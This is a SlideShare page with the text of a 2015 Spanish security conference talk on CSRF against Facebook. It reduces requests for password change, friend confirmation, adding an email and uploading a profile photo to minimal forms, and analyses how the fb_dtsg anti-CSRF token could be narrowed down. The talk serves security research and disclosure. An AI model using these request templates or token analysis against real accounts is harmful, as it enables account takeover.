SlideShare una empresa de Scribd logo

Vulnerabilidades ayer hoy

Internet Security Auditors
Internet Security Auditors

El documento habla sobre vulnerabilidades de seguridad como CSRF y cómo el token fb_dtsg de Facebook puede ser explotado para realizar peticiones no autorizadas a la plataforma. Explica cómo reducir las peticiones a Facebook a su mínima expresión para explotar el token fb_dtsg y hacer cambios de contraseña, confirmar solicitudes de amistad y más.

Tecnología
1 de 36
Descargar para leer sin conexión
Su Seguridad es Nuestro Éxito Vicente Aguilera Díaz Socio. Director Dpto. Auditoría vaguilera@isecauditors.com - @VAguileraDiaz Vulnerabilidades animadas de ayer y hoy Hack&Beers Barcelona 20 de febrero de 2015
Vicente Aguilera Díaz Vulnerabilidades animadas de ayer y hoy
Índice 1. ¿No aprendemos? 2. Una vulnerabilidad especial 3. Análisis rápido sobre Facebook Vulnerabilidades animadas de ayer y hoy
Vulnerabilidades animadas de ayer y hoy
CSRF Cross-Site Request Forgery Vulnerabilidades animadas de ayer y hoy
Vulnerabilidades animadas de ayer y hoy
Vulnerabilidades animadas de ayer y hoy
Vulnerabilidades animadas de ayer y hoy
Vulnerabilidades animadas de ayer y hoy
Vulnerabilidades animadas de ayer y hoy
VS CSRF Vulnerabilidades animadas de ayer y hoy
Modificación de contraseña Petición estándar: POST /ajax/settings/account/password.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&password_strength=2&password_old=123&pass word_new=1234&password_confirm=1234&__user=9996417249539&__a=1&__ dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9qzQC-C26x5- 9V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955714778 31176789518710056&__rev=1601460 Vulnerabilidades animadas de ayer y hoy
Modificación de contraseña Petición “mínima”: POST /ajax/settings/account/password.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&password_strength=2&password_old=123&pass word_new=1234&password_confirm=1234&__user=9996417249539&__a=1 Vulnerabilidades animadas de ayer y hoy
Confirmar petición de amistad Petición estándar: POST /ajax/reqs.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&confirm=9316813227&type=friend_connect&requ est_id=9316813227&list_item_id=9316813227_1_req&status_div_id=931681322 7_1_req_status&inline=1&ref=jewel&ego_log=AS8k5U8Ov5FMMQ2rPKND8uFV w2tLuXNakEN4ZAed90GWvx5j1oeb6ui2oLz812a_EGwV5p7ovtWd7IZsdwss4k_ 4Yu66h7ZavA2S5KQJQFQZzXNpnGKvn_1VJMQIPBpE8BRYywXrdiR2DBeqpO bVBQ&actions[accept]=1&nctr[_mod]=pagelet_bluebar&__user=9996417249539 &__a=1&__dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9qzQC- C26x59V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955 71477831176789518710056&__rev=1601460 Vulnerabilidades animadas de ayer y hoy
Confirmar petición de amistad Petición “mínima”: POST /ajax/reqs.php HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&confirm=9316813227&type=friend_connect&req uest_id=9316813227&list_item_id=9316813227_1_req&status_div_id=93168132 27_1_req_status&__user=9996417249539&__a=1 Vulnerabilidades animadas de ayer y hoy
Añadir dirección de email secundaria Petición estándar: POST /settings/email/add/submit/ HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&new_email=test%40test.com&__user=99964172 49539&__a=1&__dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9 qzQC-C26x5- 9V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955714778 31176789518710056&__rev=1601460 Vulnerabilidades animadas de ayer y hoy
Añadir dirección de email secundaria Petición “mínima”: POST /settings/email/add/submit/ HTTP/1.1 Host: www.facebook.com fb_dtsg=BSFY7tMXuZW3Wd8&new_email=test%40test.com&__user=99964172 49539&__a=1 Vulnerabilidades animadas de ayer y hoy
Añadir foto de perfil Petición estándar: POST /ajax/timeline/profile_pic_upload?source=megaphone_activation&__user= 9996417249539 &__a=1&__ dyn=7nm8RW8BgCByXzpQ9UoGyk4BBxN6yUmnOVbGAFp9qzQC-C26x5- 9V8CdDx2vBhEoBBzEy78ZS2zUy3yo&__req=30&ttstamp=36581708955714778 31176789518710056&__rev=1603460 HTTP/1.1 Host: upload.facebook.com ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="fb_dtsg" BSFY7tMXuZW3Wd8 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="profile_id" 9996417249539 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="file"; filename="noback.jpg" Content-Type: image/jpeg Vulnerabilidades animadas de ayer y hoy
Añadir foto de perfil Petición mínima: POST /ajax/timeline/profile_pic_upload?source=megaphone_activation&__user=99964 17249539&__a=1 HTTP/1.1 Host: upload.facebook.com ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="fb_dtsg" BSFY7tMXuZW3Wd8 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="profile_id" 9996417249539 ------WebKitFormBoundaryPXTrB9sO207fJ6Gd Content-Disposition: form-data; name="file"; filename="noback.jpg" Content-Type: image/jpeg Vulnerabilidades animadas de ayer y hoy
…. y podemos extrapolarlo al resto de operativas Vulnerabilidades animadas de ayer y hoy
fb_dtsg : el Santo Grial Vulnerabilidades animadas de ayer y hoy
fb_dtsg = BSFY7tMXuZW3Wd8 ¿Características? Vulnerabilidades animadas de ayer y hoy
fb_dtsg • Longitud: 15 • Rango de caracteres: – [A-Z] – [a-z] – [0-9] – [_] Vulnerabilidades animadas de ayer y hoy
fb_dtsg • Único por usuario y petición Vulnerabilidades animadas de ayer y hoy
fb_dtsg • Único por usuario y petición – ¡No se destruyen tras la petición! Vulnerabilidades animadas de ayer y hoy
fb_dtsg • 3 últimos caracteres no afectan Vulnerabilidades animadas de ayer y hoy
fb_dtsg • 3 últimos caracteres no afectan – pueden ser eliminados directamente Vulnerabilidades animadas de ayer y hoy
fb_dtsg • 2 primeros caracteres no suelen variar Vulnerabilidades animadas de ayer y hoy
fb_dtsg • 2 primeros caracteres no suelen variar – fb_dtsg = AQ… Vulnerabilidades animadas de ayer y hoy
fb_dtsg • Hasta ahora tenemos: fb_dtsg = AQ XXXXXXXXXX YYY Vulnerabilidades animadas de ayer y hoy
fb_dtsg • Otras consideraciones: – Usuarios con mayor actividad generarán más tokens válidos… – Evitar posibles medidas abusando operativas no sensibles – Y … Vulnerabilidades animadas de ayer y hoy
fb_dtsg • Otras consideraciones: – Usuarios con mayor actividad generarán más tokens válidos… – Evitar posibles medidas abusando operativas no sensibles – Hay muchas otras vías de análisis – y … Vulnerabilidades animadas de ayer y hoy
fb_dtsg ¡El resto es imaginación¡ No limites tu capacidad de inventiva: mente abierta Vulnerabilidades animadas de ayer y hoy
fb_dtsg ¡El resto es imaginación¡ No limites tu capacidad de inventiva: mente abierta Vulnerabilidades animadas de ayer y hoy
Su Seguridad es Nuestro Éxito C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com ? C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com Vicente Aguilera Díaz www.vicenteaguileradiaz.com @VAguileraDiaz
Su Seguridad es Nuestro Éxito C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com Su Seguridad es Nuestro Éxito C. Santander, 101. Edif. A. 2º E-08030 Barcelona (Spain) Tel.: +34 93 305 13 18 Fax: +34 93 278 22 48 C. Arequipa, 1 E-28043 Madrid (Spain) Tel.: +34 91 763 40 47 Fax: +34 91 382 03 96 info@isecauditors.com www.isecauditors.com

Recomendados

Hacker
HackerHacker
HackerZai M. May
 
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaPERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaInternet Security Auditors
 
CIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTCIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTInternet Security Auditors
 
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Internet Security Auditors
 
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraHackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraInternet Security Auditors
 
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCICambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCIInternet Security Auditors
 
Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...
Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...
Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...Internet Security Auditors
 
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Internet Security Auditors
 

Recomendados

Hacker
HackerHacker
HackerZai M. May
 
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaPERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarla
PERUHACK 2014: Cómo cumplir con PCI DSS...sin nombrarlaInternet Security Auditors
 
CIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTCIBERSEG'16. Técnicas #OSINT
CIBERSEG'16. Técnicas #OSINTInternet Security Auditors
 
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...
Overdrive Hacking Conference 2016 - Riesgos en el uso de las Redes Sociales (...Internet Security Auditors
 
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraHackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente Aguilera
Hackmeeting 2003: Métodos actuales de apropiación de dominios. Vicente AguileraInternet Security Auditors
 
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCICambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCI
Cambios de las versiones 3.2, Cuestionarios y Ecosistema de Normas PCIInternet Security Auditors
 
Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...
Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...
Curso de Práctica Operativa en Investigación. Módulo 5. Internet Security Aud...Internet Security Auditors
 
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...
Ncn2014. Vigilados: explotando las redes sociales para predecir nuestro compo...Internet Security Auditors
 
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Internet Security Auditors
 
(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.Internet Security Auditors
 
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Internet Security Auditors
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
 
PCI DSS en la Nube
PCI DSS en la NubePCI DSS en la Nube
PCI DSS en la NubeInternet Security Auditors
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?Internet Security Auditors
 
La marca / el secreto esta en la marca de OMPI
La marca / el secreto esta en la marca de OMPILa marca / el secreto esta en la marca de OMPI
La marca / el secreto esta en la marca de OMPIJorge Teran
 
Annual-Report-2015_forweb
Annual-Report-2015_forwebAnnual-Report-2015_forweb
Annual-Report-2015_forwebKate Varghese
 
IT_CV_Mahmoud Zohori
IT_CV_Mahmoud ZohoriIT_CV_Mahmoud Zohori
IT_CV_Mahmoud ZohoriMahmoud Zohori
 
Marketing de Resultados
Marketing de ResultadosMarketing de Resultados
Marketing de ResultadosHector Maida
 
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose NächteFehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose NächteTrivadis
 
La Vente B2B
La Vente B2BLa Vente B2B
La Vente B2BJohn Carmichael
 
Analisis de sitio
Analisis de sitioAnalisis de sitio
Analisis de sitiojgmxs
 
“Youth Employment- A Global Goal, A National Challenge” (ILO) 2006
“Youth Employment- A Global Goal, A National Challenge” (ILO) 2006 “Youth Employment- A Global Goal, A National Challenge” (ILO) 2006
“Youth Employment- A Global Goal, A National Challenge” (ILO) 2006UN Focal Point on Youth, Division for Social Policy and Development
 
Tarea 1 marta mendoza
Tarea 1 marta mendozaTarea 1 marta mendoza
Tarea 1 marta mendozacarolina mendoza
 
Presentacion cta cte-rotary-luis zapata 2016
Presentacion cta cte-rotary-luis zapata 2016Presentacion cta cte-rotary-luis zapata 2016
Presentacion cta cte-rotary-luis zapata 2016JUAN CONTRERAS CACERES
 
Presentase Tutorial Blog dan Email
Presentase Tutorial Blog dan EmailPresentase Tutorial Blog dan Email
Presentase Tutorial Blog dan EmailCrimson Crimes
 
Double optinandemailmarketing en
Double optinandemailmarketing enDouble optinandemailmarketing en
Double optinandemailmarketing enTalkfusion Vídeo e Comunicação
 
Mary Rodwell - Triggers of Consciousness
Mary Rodwell - Triggers of ConsciousnessMary Rodwell - Triggers of Consciousness
Mary Rodwell - Triggers of ConsciousnessExopolitics Hungary
 
al Andalus
al Andalusal Andalus
al Andalusavilase2
 
Smart Grids y ciberseguridad
Smart Grids y ciberseguridadSmart Grids y ciberseguridad
Smart Grids y ciberseguridadFernando Tricas García
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 

Más contenido relacionado

Destacado

Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Internet Security Auditors
 
(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.Internet Security Auditors
 
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Internet Security Auditors
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...Internet Security Auditors
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?Internet Security Auditors
 
La marca / el secreto esta en la marca de OMPI
La marca / el secreto esta en la marca de OMPILa marca / el secreto esta en la marca de OMPI
La marca / el secreto esta en la marca de OMPIJorge Teran
 
Annual-Report-2015_forweb
Annual-Report-2015_forwebAnnual-Report-2015_forweb
Annual-Report-2015_forwebKate Varghese
 
Marketing de Resultados
Marketing de ResultadosMarketing de Resultados
Marketing de ResultadosHector Maida
 
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose NächteFehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose NächteTrivadis
 
Analisis de sitio
Analisis de sitioAnalisis de sitio
Analisis de sitiojgmxs
 
Presentacion cta cte-rotary-luis zapata 2016
Presentacion cta cte-rotary-luis zapata 2016Presentacion cta cte-rotary-luis zapata 2016
Presentacion cta cte-rotary-luis zapata 2016JUAN CONTRERAS CACERES
 
Presentase Tutorial Blog dan Email
Presentase Tutorial Blog dan EmailPresentase Tutorial Blog dan Email
Presentase Tutorial Blog dan EmailCrimson Crimes
 
Mary Rodwell - Triggers of Consciousness
Mary Rodwell - Triggers of ConsciousnessMary Rodwell - Triggers of Consciousness
Mary Rodwell - Triggers of ConsciousnessExopolitics Hungary
 
al Andalus
al Andalusal Andalus
al Andalusavilase2
 

Destacado (20)

Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
Cybercamp 2014. Tinfoleak: Analizando nuestras pautas y comportamientos a tr...
 
(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.(ISC)2 Security Congress EMEA. You are being watched.
(ISC)2 Security Congress EMEA. You are being watched.
 
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
Catosfera 2016: Anàlisi de xarxes socials amb finalitats d'investigació: ris...
 
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
VI Foro Evidencias Electrónicas en la Investigación Policial. Análisis forens...
 
PCI DSS en la Nube
PCI DSS en la NubePCI DSS en la Nube
PCI DSS en la Nube
 
RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?RootedCon 2017 - Workshop: IoT Insecurity of Things?
RootedCon 2017 - Workshop: IoT Insecurity of Things?
 
La marca / el secreto esta en la marca de OMPI
La marca / el secreto esta en la marca de OMPILa marca / el secreto esta en la marca de OMPI
La marca / el secreto esta en la marca de OMPI
 
Annual-Report-2015_forweb
Annual-Report-2015_forwebAnnual-Report-2015_forweb
Annual-Report-2015_forweb
 
IT_CV_Mahmoud Zohori
IT_CV_Mahmoud ZohoriIT_CV_Mahmoud Zohori
IT_CV_Mahmoud Zohori
 
Marketing de Resultados
Marketing de ResultadosMarketing de Resultados
Marketing de Resultados
 
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose NächteFehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
Fehlertolerante Ladeprozesse in Oracle gegen schlaflose Nächte
 
La Vente B2B
La Vente B2BLa Vente B2B
La Vente B2B
 
Analisis de sitio
Analisis de sitioAnalisis de sitio
Analisis de sitio
 
“Youth Employment- A Global Goal, A National Challenge” (ILO) 2006
“Youth Employment- A Global Goal, A National Challenge” (ILO) 2006 “Youth Employment- A Global Goal, A National Challenge” (ILO) 2006
“Youth Employment- A Global Goal, A National Challenge” (ILO) 2006
 
Tarea 1 marta mendoza
Tarea 1 marta mendozaTarea 1 marta mendoza
Tarea 1 marta mendoza
 
Presentacion cta cte-rotary-luis zapata 2016
Presentacion cta cte-rotary-luis zapata 2016Presentacion cta cte-rotary-luis zapata 2016
Presentacion cta cte-rotary-luis zapata 2016
 
Presentase Tutorial Blog dan Email
Presentase Tutorial Blog dan EmailPresentase Tutorial Blog dan Email
Presentase Tutorial Blog dan Email
 
Double optinandemailmarketing en
Double optinandemailmarketing enDouble optinandemailmarketing en
Double optinandemailmarketing en
 
Mary Rodwell - Triggers of Consciousness
Mary Rodwell - Triggers of ConsciousnessMary Rodwell - Triggers of Consciousness
Mary Rodwell - Triggers of Consciousness
 
al Andalus
al Andalusal Andalus
al Andalus
 

Similar a Vulnerabilidades ayer hoy

Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Cristián Rojas, MSc., CSSLP
 
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...RootedCON
 
Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014
Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014
Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014Paul Fervoy
 
Presentacion Ontología de Seguridad para la securización de sistemas
Presentacion Ontología de Seguridad para la securización de sistemasPresentacion Ontología de Seguridad para la securización de sistemas
Presentacion Ontología de Seguridad para la securización de sistemasguesta3f6ce
 
Asegúr@IT IV - Botnets 2.0
Asegúr@IT IV - Botnets 2.0Asegúr@IT IV - Botnets 2.0
Asegúr@IT IV - Botnets 2.0Chema Alonso
 
La digitalización de la empresa familiar
La digitalización de la empresa familiarLa digitalización de la empresa familiar
La digitalización de la empresa familiarEsteban Romero Frías
 
Introducción a la economía digital 2017
Introducción a la economía digital 2017Introducción a la economía digital 2017
Introducción a la economía digital 2017Esteban Romero Frías
 
Eres más hackeable de lo que piensas
Eres más hackeable de lo que piensasEres más hackeable de lo que piensas
Eres más hackeable de lo que piensasRoberto Garcia Amoriz
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que creesRober Garamo
 
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataquesWelcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataquesFrancisco Javier Barrena
 
Hacking SEO
Hacking SEOHacking SEO
Hacking SEOSemrush
 
Panorama actual de la ciberseguridad en España
Panorama actual de la ciberseguridad en EspañaPanorama actual de la ciberseguridad en España
Panorama actual de la ciberseguridad en EspañaThe Cocktail Analysis
 
Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...
Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...
Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...Francisco Javier Barrena
 
Mercadeo Digital para impulsar PyME Globales
Mercadeo Digital para impulsar PyME Globales Mercadeo Digital para impulsar PyME Globales
Mercadeo Digital para impulsar PyME Globales Paul Fervoy
 
TICs de Mercadeo para las PyME - Parque la Libertad
TICs de Mercadeo para las PyME - Parque la LibertadTICs de Mercadeo para las PyME - Parque la Libertad
TICs de Mercadeo para las PyME - Parque la LibertadPaul Fervoy
 
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...
Pablo González y Francisco Ramirez - Anatomy of a modern malware. How easy th...RootedCON
 

Similar a Vulnerabilidades ayer hoy (20)

Smart Grids y ciberseguridad
Smart Grids y ciberseguridadSmart Grids y ciberseguridad
Smart Grids y ciberseguridad
 
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
Tu banca móvil, en forma simple y ¿segura? Estado de la seguridad en apps móv...
 
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
Pablo González & Juan Antonio Calles – Cyberwar: Looking for… touchdown! [Roo...
 
Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014
Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014
Como hacer Mercadeo en el Web Social para PyME - Estrategias y Herramientas 2014
 
Seguridad Web 09
Seguridad Web 09Seguridad Web 09
Seguridad Web 09
 
Presentacion Ontología de Seguridad para la securización de sistemas
Presentacion Ontología de Seguridad para la securización de sistemasPresentacion Ontología de Seguridad para la securización de sistemas
Presentacion Ontología de Seguridad para la securización de sistemas
 
Ciberseguridad Mexico
Ciberseguridad MexicoCiberseguridad Mexico
Ciberseguridad Mexico
 
Asegúr@IT IV - Botnets 2.0
Asegúr@IT IV - Botnets 2.0Asegúr@IT IV - Botnets 2.0
Asegúr@IT IV - Botnets 2.0
 
La digitalización de la empresa familiar
La digitalización de la empresa familiarLa digitalización de la empresa familiar
La digitalización de la empresa familiar
 
Introducción a la economía digital 2017
Introducción a la economía digital 2017Introducción a la economía digital 2017
Introducción a la economía digital 2017
 
Eres más hackeable de lo que piensas
Eres más hackeable de lo que piensasEres más hackeable de lo que piensas
Eres más hackeable de lo que piensas
 
Eres más hackeable de lo que crees
Eres más hackeable de lo que creesEres más hackeable de lo que crees
Eres más hackeable de lo que crees
 
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataquesWelcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
Welcome to Gotham - Nuevas formas ingeniosas y terroríficas de ciberataques
 
Hacking SEO
Hacking SEOHacking SEO
Hacking SEO
 
Panorama actual de la ciberseguridad en España
Panorama actual de la ciberseguridad en EspañaPanorama actual de la ciberseguridad en España
Panorama actual de la ciberseguridad en España
 
Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...
Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...
Codemotion 2020 - Big Data en Ciberseguridad: mejor morir de pie que vivir ar...
 
Mercadeo Digital para impulsar PyME Globales
Mercadeo Digital para impulsar PyME Globales Mercadeo Digital para impulsar PyME Globales
Mercadeo Digital para impulsar PyME Globales
 
TICs de Mercadeo para las PyME - Parque la Libertad
TICs de Mercadeo para las PyME - Parque la LibertadTICs de Mercadeo para las PyME - Parque la Libertad
TICs de Mercadeo para las PyME - Parque la Libertad
 
